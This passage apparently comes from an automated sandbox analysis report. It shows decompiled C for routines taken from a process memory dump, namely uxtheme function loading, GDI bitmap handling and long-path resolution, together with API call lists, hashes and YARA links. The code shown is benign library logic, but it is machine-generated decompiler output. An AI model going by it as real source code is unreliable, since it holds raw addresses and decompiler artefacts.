						 *0x99c9a8 = GetProcAddress( *0x99ca40, "HitTestThemeBackground");
						 *0x99c9ac = GetProcAddress( *0x99ca40, "DrawThemeEdge");
						 *0x99c9b0 = GetProcAddress( *0x99ca40, "DrawThemeIcon");
						 *0x99c9b4 = GetProcAddress( *0x99ca40, "IsThemePartDefined");
						 *0x99c9b8 = GetProcAddress( *0x99ca40, "IsThemeBackgroundPartiallyTransparent");
						 *0x99c9bc = GetProcAddress( *0x99ca40, "GetThemeColor");
						 *0x99c9c0 = GetProcAddress( *0x99ca40, "GetThemeMetric");
						 *0x99c9c4 = GetProcAddress( *0x99ca40, "GetThemeString");
						 *0x99c9c8 = GetProcAddress( *0x99ca40, "GetThemeBool");
						 *0x99c9cc = GetProcAddress( *0x99ca40, "GetThemeInt");
						 *0x99c9d0 = GetProcAddress( *0x99ca40, "GetThemeEnumValue");
						 *0x99c9d4 = GetProcAddress( *0x99ca40, "GetThemePosition");
						 *0x99c9d8 = GetProcAddress( *0x99ca40, "GetThemeFont");
						 *0x99c9dc = GetProcAddress( *0x99ca40, "GetThemeRect");
						 *0x99c9e0 = GetProcAddress( *0x99ca40, "GetThemeMargins");
						 *0x99c9e4 = GetProcAddress( *0x99ca40, "GetThemeIntList");
						 *0x99c9e8 = GetProcAddress( *0x99ca40, "GetThemePropertyOrigin");
						 *0x99c9ec = GetProcAddress( *0x99ca40, "SetWindowTheme");
						 *0x99c9f0 = GetProcAddress( *0x99ca40, "GetThemeFilename");
						 *0x99c9f4 = GetProcAddress( *0x99ca40, "GetThemeSysColor");
						 *0x99c9f8 = GetProcAddress( *0x99ca40, "GetThemeSysColorBrush");
						 *0x99c9fc = GetProcAddress( *0x99ca40, "GetThemeSysBool");
						 *0x99ca00 = GetProcAddress( *0x99ca40, "GetThemeSysSize");
						 *0x99ca04 = GetProcAddress( *0x99ca40, "GetThemeSysFont");
						 *0x99ca08 = GetProcAddress( *0x99ca40, "GetThemeSysString");
						 *0x99ca0c = GetProcAddress( *0x99ca40, "GetThemeSysInt");
						 *0x99ca10 = GetProcAddress( *0x99ca40, "IsThemeActive");
						 *0x99ca14 = GetProcAddress( *0x99ca40, "IsAppThemed");
						 *0x99ca18 = GetProcAddress( *0x99ca40, "GetWindowTheme");
						 *0x99ca1c = GetProcAddress( *0x99ca40, "EnableThemeDialogTexture");
						 *0x99ca20 = GetProcAddress( *0x99ca40, "IsThemeDialogTextureEnabled");
						 *0x99ca24 = GetProcAddress( *0x99ca40, "GetThemeAppProperties");
						 *0x99ca28 = GetProcAddress( *0x99ca40, "SetThemeAppProperties");
						 *0x99ca2c = GetProcAddress( *0x99ca40, "GetCurrentThemeName");
						 *0x99ca30 = GetProcAddress( *0x99ca40, "GetThemeDocumentationProperty");
						 *0x99ca34 = GetProcAddress( *0x99ca40, "DrawThemeParentBackground");
						 *0x99ca38 = GetProcAddress( *0x99ca40, "EnableTheming");
					}
				}
				_v5 =  *0x99ca40 > 0;
				_pop(_t108);
				 *[fs:eax] = _t108;
				_push(0x96750e);
				_t6 =  *0x99ca48; // 0xf00dc8
				return E00966F54(_t6);
			}








                                            0x0096715e
                                            0x00967163
                                            0x0096716a
                                            0x0096716b
                                            0x00967170
                                            0x00967173
                                            0x00967176
                                            0x0096717f
                                            0x0096718f
                                            0x00967194
                                            0x009671a7
                                            0x009671b9
                                            0x009671cb
                                            0x009671dd
                                            0x009671ef
                                            0x00967201
                                            0x00967213
                                            0x00967225
                                            0x00967237
                                            0x00967249
                                            0x0096725b
                                            0x0096726d
                                            0x0096727f
                                            0x00967291
                                            0x009672a3
                                            0x009672b5
                                            0x009672c7
                                            0x009672d9
                                            0x009672eb
                                            0x009672fd
                                            0x0096730f
                                            0x00967321
                                            0x00967333
                                            0x00967345
                                            0x00967357
                                            0x00967369
                                            0x0096737b
                                            0x0096738d
                                            0x0096739f
                                            0x009673b1
                                            0x009673c3
                                            0x009673d5
                                            0x009673e7
                                            0x009673f9
                                            0x0096740b
                                            0x0096741d
                                            0x0096742f
                                            0x00967441
                                            0x00967453
                                            0x00967465
                                            0x00967477
                                            0x00967489
                                            0x0096749b
                                            0x009674ad
                                            0x009674bf
                                            0x009674d1
                                            0x009674e3
                                            0x009674e3
                                            0x00967194
                                            0x009674eb
                                            0x009674f1
                                            0x009674f4
                                            0x009674f7
                                            0x009674fc
                                            0x00967506

                                            APIs
                                            • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,00967507), ref: 0096718A
                                            • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 009671A2
                                            • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 009671B4
                                            • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 009671C6
                                            • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 009671D8
                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 009671EA
                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 009671FC
                                            • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0096720E
                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 00967220
                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 00967232
                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 00967244
                                            • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 00967256
                                            • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 00967268
                                            • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0096727A
                                            • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0096728C
                                            • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0096729E
                                            • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 009672B0
                                            • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 009672C2
                                            • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 009672D4
                                            • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 009672E6
                                            • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 009672F8
                                            • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0096730A
                                            • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0096731C
                                            • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0096732E
                                            • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 00967340
                                            • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 00967352
                                            • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 00967364
                                            • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 00967376
                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00967388
                                            • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0096739A
                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 009673AC
                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 009673BE
                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 009673D0
                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 009673E2
                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 009673F4
                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 00967406
                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 00967418
                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0096742A
                                            • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0096743C
                                            • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0096744E
                                            • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 00967460
                                            • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 00967472
                                            • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 00967484
                                            • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 00967496
                                            • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 009674A8
                                            • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 009674BA
                                            • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 009674CC
                                            • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 009674DE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad
                                            • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                            • API String ID: 2238633743-2910565190
                                            • Opcode ID: 174b6b9c569e6720c0014518c566a86a9e0d60df3217c6e3260cb8b15ee5de1c
                                            • Instruction ID: 49cdc374b3489cf5cde3462d681d069215604237d96ac58b350ae877c0edab1c
                                            • Opcode Fuzzy Hash: 174b6b9c569e6720c0014518c566a86a9e0d60df3217c6e3260cb8b15ee5de1c
                                            • Instruction Fuzzy Hash: A6A19DF0A597A0AFDF08EFF8DCC6E2977A8EB8670834405A6B414CF256D674D804DB12
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 009622E0, Relevance: 48.5, APIs: 32, Instructions: 500windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 72%
                                            			E009622E0(struct HBITMAP__* __eax, struct HPALETTE__* __ecx, struct HPALETTE__* __edx, intOrPtr _a4, signed int _a8) {
				struct HBITMAP__* _v8;
				struct HPALETTE__* _v12;
				struct HPALETTE__* _v16;
				struct HPALETTE__* _v20;
				void* _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				struct HDC__* _v36;
				BITMAPINFO* _v40;
				void* _v44;
				intOrPtr _v48;
				struct tagRGBQUAD _v52;
				struct HPALETTE__* _v56;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v132;
				intOrPtr _v136;
				void _v140;
				struct tagRECT _v156;
				void* __ebx;
				void* __ebp;
				signed short _t229;
				int _t281;
				signed int _t290;
				signed short _t292;
				struct HBRUSH__* _t366;
				struct HPALETTE__* _t422;
				signed int _t441;
				intOrPtr _t442;
				intOrPtr _t444;
				intOrPtr _t445;
				void* _t455;
				void* _t457;
				void* _t459;
				intOrPtr _t460;

				_t457 = _t459;
				_t460 = _t459 + 0xffffff68;
				_push(_t419);
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = 0;
				if( *(_a8 + 0x18) == 0 ||  *(_a8 + 0x1c) != 0 &&  *(_a8 + 0x20) != 0) {
					if( *(_a8 + 0x18) != 0 ||  *(_a8 + 4) != 0 &&  *(_a8 + 8) != 0) {
						E00961E9C(_v8);
						_v116 = 0;
						if(_v8 != 0 && GetObjectA(_v8, 0x54,  &_v140) < 0x18) {
							E00960794();
						}
						_v28 = E009608A8(GetDC(0));
						_v32 = E009608A8(CreateCompatibleDC(_v28));
						_push(_t457);
						_push(0x96292e);
						_push( *[fs:edx]);
						 *[fs:edx] = _t460;
						if( *(_a8 + 0x18) >= 0x28) {
							_v40 = E009426FC(0x42c);
							_push(_t457);
							_push(0x962638);
							_push( *[fs:edx]);
							 *[fs:edx] = _t460;
							 *(_a8 + 0x18) = 0x28;
							 *((short*)(_a8 + 0x24)) = 1;
							if( *(_a8 + 0x26) == 0) {
								_t290 = GetDeviceCaps(_v28, 0xc);
								_t292 = GetDeviceCaps(_v28, 0xe);
								_t419 = _t290 * _t292;
								 *(_a8 + 0x26) = _t290 * _t292;
							}
							memcpy(_v40, _a8 + 0x18, 0xa << 2);
							 *(_a8 + 4) =  *(_a8 + 0x1c);
							_t441 = _a8;
							 *(_t441 + 8) =  *(_a8 + 0x20);
							if( *(_a8 + 0x26) > 8) {
								_t229 =  *(_a8 + 0x26);
								if(_t229 == 0x10) {
									L30:
									if(( *(_a8 + 0x28) & 0x00000003) != 0) {
										E00962294(_a8);
										_t104 =  &(_v40->bmiColors); // 0x29
										_t441 = _t104;
										E009428F8(_a8 + 0x40, 0xc, _t441);
									}
								} else {
									_t441 = _a8;
									if(_t229 == 0x20) {
										goto L30;
									}
								}
							} else {
								if( *(_a8 + 0x26) != 1 || _v8 != 0 && _v120 != 0) {
									if(_v16 == 0) {
										if(_v8 != 0) {
											_v24 = SelectObject(_v32, _v8);
											if(_v116 <= 0 || _v120 == 0) {
												asm("cdq");
												GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, 0, _v40, 0);
											} else {
												_t281 = GetDIBColorTable(_v32, 0, 0x100,  &(_v40->bmiColors));
												_t441 = _a8;
												 *(_t441 + 0x38) = _t281;
											}
											SelectObject(_v32, _v24);
										}
									} else {
										_t76 =  &(_v40->bmiColors); // 0x29
										_t441 = _t76;
										E0096103C(_v16, 0xff, _t441);
									}
								} else {
									_t441 = 0;
									_v40->bmiColors = 0;
									 *((intOrPtr*)(_v40 + 0x2c)) = 0xffffff;
								}
							}
							_v20 = E009608A8(CreateDIBSection(_v28, _v40, 0,  &_v44, 0, 0));
							if(_v44 == 0) {
								E00960800(_t419);
							}
							if(_v8 == 0 ||  *(_a8 + 0x1c) != _v136 ||  *(_a8 + 0x20) != _v132 ||  *(_a8 + 0x26) <= 8) {
								_pop(_t442);
								 *[fs:eax] = _t442;
								_push(0x96263f);
								return E0094271C(_v40);
							} else {
								asm("cdq");
								GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, _v44, _v40, 0);
								E00943A10();
								E00943A10();
								goto L58;
							}
						} else {
							if(( *(_a8 + 0x10) |  *(_a8 + 0x12)) != 1) {
								_v20 = E009608A8(CreateCompatibleBitmap(_v28,  *(_a8 + 4),  *(_a8 + 8)));
							} else {
								_v20 = E009608A8(CreateBitmap( *(_a8 + 4),  *(_a8 + 8), 1, 1, 0));
							}
							E009608A8(_v20);
							_v24 = E009608A8(SelectObject(_v32, _v20));
							_push(_t457);
							_push(0x9628df);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							_push(_t457);
							_push(0x9628ce);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							_v56 = 0;
							_t422 = 0;
							if(_v16 != 0) {
								_v56 = SelectPalette(_v32, _v16, 0);
								RealizePalette(_v32);
							}
							_push(_t457);
							_push(0x9628ac);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							if(_a4 == 0) {
								PatBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), 0xff0062);
							} else {
								_t366 = E0095FE64( *((intOrPtr*)(_a4 + 0x14)));
								E00955854(0,  *(_a8 + 4), 0,  &_v156,  *(_a8 + 8));
								FillRect(_v32,  &_v156, _t366);
								SetTextColor(_v32, E0095F1A4( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
								SetBkColor(_v32, E0095F1A4(E0095FE28( *((intOrPtr*)(_a4 + 0x14)))));
								if( *(_a8 + 0x26) == 1 &&  *((intOrPtr*)(_a8 + 0x14)) != 0) {
									_v52 = E0095F1A4( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18)));
									_v48 = E0095F1A4(E0095FE28( *((intOrPtr*)(_a4 + 0x14))));
									SetDIBColorTable(_v32, 0, 2,  &_v52);
								}
							}
							if(_v8 == 0) {
								_pop(_t444);
								 *[fs:eax] = _t444;
								_push(0x9628b3);
								if(_v16 != 0) {
									return SelectPalette(_v32, _v56, 0xffffffff);
								}
								return 0;
							} else {
								_v36 = E009608A8(CreateCompatibleDC(_v28));
								_push(_t457);
								_push(0x962882);
								_push( *[fs:eax]);
								 *[fs:eax] = _t460;
								_t455 = E009608A8(SelectObject(_v36, _v8));
								if(_v12 != 0) {
									_t422 = SelectPalette(_v36, _v12, 0);
									RealizePalette(_v36);
								}
								if(_a4 != 0) {
									SetTextColor(_v36, E0095F1A4( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
									SetBkColor(_v36, E0095F1A4(E0095FE28( *((intOrPtr*)(_a4 + 0x14)))));
								}
								BitBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), _v36, 0, 0, 0xcc0020);
								if(_v12 != 0) {
									SelectPalette(_v36, _t422, 0xffffffff);
								}
								E009608A8(SelectObject(_v36, _t455));
								_pop(_t445);
								 *[fs:eax] = _t445;
								_push(0x962889);
								return DeleteDC(_v36);
							}
						}
					} else {
						goto L58;
					}
				} else {
					L58:
					return _v20;
				}
			}






































                                            0x009622e1
                                            0x009622e3
                                            0x009622e9
                                            0x009622ec
                                            0x009622ef
                                            0x009622f2
                                            0x009622f7
                                            0x00962301
                                            0x00962324
                                            0x00962343
                                            0x0096234a
                                            0x00962351
                                            0x0096236a
                                            0x0096236a
                                            0x0096237b
                                            0x0096238c
                                            0x00962391
                                            0x00962392
                                            0x00962397
                                            0x0096239a
                                            0x009623a4
                                            0x0096240e
                                            0x00962413
                                            0x00962414
                                            0x00962419
                                            0x0096241c
                                            0x00962422
                                            0x0096242c
                                            0x0096243a
                                            0x00962442
                                            0x0096244f
                                            0x00962454
                                            0x0096245b
                                            0x0096245b
                                            0x0096246f
                                            0x0096247a
                                            0x00962483
                                            0x00962486
                                            0x00962491
                                            0x00962561
                                            0x00962569
                                            0x00962574
                                            0x0096257b
                                            0x00962580
                                            0x00962588
                                            0x00962588
                                            0x00962596
                                            0x00962596
                                            0x0096256b
                                            0x0096256b
                                            0x00962572
                                            0x00000000
                                            0x00000000
                                            0x00962572
                                            0x00962497
                                            0x0096249f
                                            0x009624cd
                                            0x009624eb
                                            0x009624fe
                                            0x00962505
                                            0x0096253a
                                            0x0096254a
                                            0x0096250d
                                            0x0096251f
                                            0x00962524
                                            0x00962527
                                            0x00962527
                                            0x00962557
                                            0x00962557
                                            0x009624cf
                                            0x009624d2
                                            0x009624d2
                                            0x009624dd
                                            0x009624dd
                                            0x009624ad
                                            0x009624b0
                                            0x009624b2
                                            0x009624be
                                            0x009624be
                                            0x0096249f
                                            0x009625b7
                                            0x009625be
                                            0x009625c0
                                            0x009625c0
                                            0x009625c9
                                            0x00962624
                                            0x00962627
                                            0x0096262a
                                            0x00962637
                                            0x009625ee
                                            0x009625fe
                                            0x0096260e
                                            0x00962613
                                            0x00962618
                                            0x00000000
                                            0x00962618
                                            0x009623a6
                                            0x009623b8
                                            0x009623fc
                                            0x009623ba
                                            0x009623d8
                                            0x009623d8
                                            0x00962642
                                            0x00962659
                                            0x0096265e
                                            0x0096265f
                                            0x00962664
                                            0x00962667
                                            0x0096266c
                                            0x0096266d
                                            0x00962672
                                            0x00962675
                                            0x0096267a
                                            0x0096267d
                                            0x00962683
                                            0x00962694
                                            0x0096269b
                                            0x0096269b
                                            0x009626a2
                                            0x009626a3
                                            0x009626a8
                                            0x009626ab
                                            0x009626b2
                                            0x00962788
                                            0x009626b8
                                            0x009626be
                                            0x009626dc
                                            0x009626ec
                                            0x00962704
                                            0x0096271e
                                            0x0096272b
                                            0x00962744
                                            0x00962757
                                            0x00962766
                                            0x00962766
                                            0x0096272b
                                            0x00962791
                                            0x0096288b
                                            0x0096288e
                                            0x00962891
                                            0x0096289a
                                            0x00000000
                                            0x009628a6
                                            0x009628ab
                                            0x00962797
                                            0x009627a5
                                            0x009627aa
                                            0x009627ab
                                            0x009627b0
                                            0x009627b3
                                            0x009627c8
                                            0x009627ce
                                            0x009627df
                                            0x009627e5
                                            0x009627e5
                                            0x009627ee
                                            0x00962803
                                            0x0096281d
                                            0x0096281d
                                            0x00962845
                                            0x0096284e
                                            0x00962857
                                            0x00962857
                                            0x00962866
                                            0x0096286d
                                            0x00962870
                                            0x00962873
                                            0x00962881
                                            0x00962881
                                            0x00962791
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00962935
                                            0x00962935
                                            0x0096293e
                                            0x0096293e

                                            APIs
                                            • GetObjectA.GDI32(00000000,00000054,?), ref: 00962360
                                            • GetDC.USER32 ref: 00962371
                                            • CreateCompatibleDC.GDI32(00000000), ref: 00962382
                                            • CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 009623CE
                                            • CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 009623F2
                                            • SelectObject.GDI32(?,?), ref: 0096264F
                                            • SelectPalette.GDI32(?,00000000,00000000), ref: 0096268F
                                            • RealizePalette.GDI32(?), ref: 0096269B
                                            • SetTextColor.GDI32(?,00000000), ref: 00962704
                                            • SetBkColor.GDI32(?,00000000), ref: 0096271E
                                            • SetDIBColorTable.GDI32(?,00000000,00000002,?,?,00000000,?,00000000,?,?,00000000,00000000,009628AC,?,00000000,009628CE), ref: 00962766
                                            • FillRect.USER32 ref: 009626EC
                                              • Part of subcall function 0095F1A4: GetSysColor.USER32(?), ref: 0095F1AE
                                            • PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 00962788
                                            • CreateCompatibleDC.GDI32(00000028), ref: 0096279B
                                            • SelectObject.GDI32(?,00000000), ref: 009627BE
                                            • SelectPalette.GDI32(?,00000000,00000000), ref: 009627DA
                                            • RealizePalette.GDI32(?), ref: 009627E5
                                            • SetTextColor.GDI32(?,00000000), ref: 00962803
                                            • SetBkColor.GDI32(?,00000000), ref: 0096281D
                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00962845
                                            • SelectPalette.GDI32(?,00000000,000000FF), ref: 00962857
                                            • SelectObject.GDI32(?,00000000), ref: 00962861
                                            • DeleteDC.GDI32(?), ref: 0096287C
                                              • Part of subcall function 0095FE64: CreateBrushIndirect.GDI32(?), ref: 0095FF0E
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
                                            • String ID:
                                            • API String ID: 1299887459-0
                                            • Opcode ID: ed0dce78c47aa40baaa5d68a949f4bb591e2b21735539e8fa1a9117832e7436d
                                            • Instruction ID: 3d61477905c069c7926d70fb61f435d333013b2452a26e34f1da1bb2ccd9690b
                                            • Opcode Fuzzy Hash: ed0dce78c47aa40baaa5d68a949f4bb591e2b21735539e8fa1a9117832e7436d
                                            • Instruction Fuzzy Hash: B912F8B5A00608AFDB14EFA8C985F9EB7B8EF49310F118455F914EB2A1C775ED40CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 009452FC, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136stringlibraryfileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 53%
                                            			E009452FC(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E009452E8(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E009452E8(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L009412D4();
									while( *_t93 != 0) {
										_t90 = E009452E8(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L009412D4();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L009412DC();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L009412D4();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L009412DC();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L009412D4();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L009412D4();
						}
					}
				}
				L17:
				return _v16;
			}



















                                            0x00945308
                                            0x0094530b
                                            0x00945311
                                            0x0094531e
                                            0x00945322
                                            0x00945364
                                            0x0094536a
                                            0x009453a7
                                            0x00000000
                                            0x0094536c
                                            0x00945373
                                            0x00945384
                                            0x00945389
                                            0x0094538f
                                            0x00945397
                                            0x0094539c
                                            0x009453aa
                                            0x009453ac
                                            0x009453b2
                                            0x009453b6
                                            0x009453bd
                                            0x009453be
                                            0x00945469
                                            0x009453d0
                                            0x009453d4
                                            0x009453e1
                                            0x009453e8
                                            0x009453e9
                                            0x009453f2
                                            0x009453f3
                                            0x0094540b
                                            0x00945410
                                            0x00945413
                                            0x00945418
                                            0x0094541e
                                            0x0094541f
                                            0x0094542f
                                            0x00945431
                                            0x00945441
                                            0x00945448
                                            0x00945452
                                            0x00945453
                                            0x00945458
                                            0x0094545e
                                            0x0094545f
                                            0x00945465
                                            0x00945467
                                            0x00000000
                                            0x00945467
                                            0x0094542f
                                            0x00945410
                                            0x00000000
                                            0x009453e1
                                            0x00945475
                                            0x0094547c
                                            0x00945480
                                            0x00945481
                                            0x00945481
                                            0x0094539c
                                            0x00945389
                                            0x00945373
                                            0x00945324
                                            0x0094532f
                                            0x00945333
                                            0x00000000
                                            0x00945335
                                            0x00945335
                                            0x00945340
                                            0x00945344
                                            0x00945349
                                            0x00000000
                                            0x0094534b
                                            0x0094534e
                                            0x00945355
                                            0x00945359
                                            0x0094535a
                                            0x0094535a
                                            0x00945349
                                            0x00945333
                                            0x00945486
                                            0x0094548f

                                            APIs
                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,108B0099,0099A0A4,?,0094555C,00000000,009455B9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00945319
                                            • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 0094532A
                                            • lstrcpyn.KERNEL32(?,?,?,?,108B0099,0099A0A4,?,0094555C,00000000,009455B9,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 0094535A
                                            • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,108B0099,0099A0A4,?,0094555C,00000000,009455B9,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 009453BE
                                            • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,108B0099,0099A0A4,?,0094555C,00000000,009455B9,?,80000001), ref: 009453F3
                                            • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,108B0099,0099A0A4,?,0094555C,00000000,009455B9), ref: 00945406
                                            • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,108B0099,0099A0A4,?,0094555C,00000000), ref: 00945413
                                            • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,108B0099,0099A0A4,?,0094555C), ref: 0094541F
                                            • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 00945453
                                            • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 0094545F
                                            • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 00945481
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
